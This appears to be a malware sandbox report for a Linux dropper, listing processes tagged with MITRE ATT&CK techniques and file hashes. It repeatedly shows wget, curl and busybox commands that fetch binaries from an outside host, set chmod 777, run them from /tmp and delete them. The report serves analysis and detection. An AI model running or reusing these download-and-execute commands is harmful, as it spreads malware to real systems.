/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI./QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx./u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet./8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:967
-
-
/bin/chmodchmod 777 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0./9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX./0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:981
-
-
/bin/chmodchmod 777 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30./DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh./G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys./S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB./9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:1009
-
-
/bin/chmodchmod 777 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5./YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:1012
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97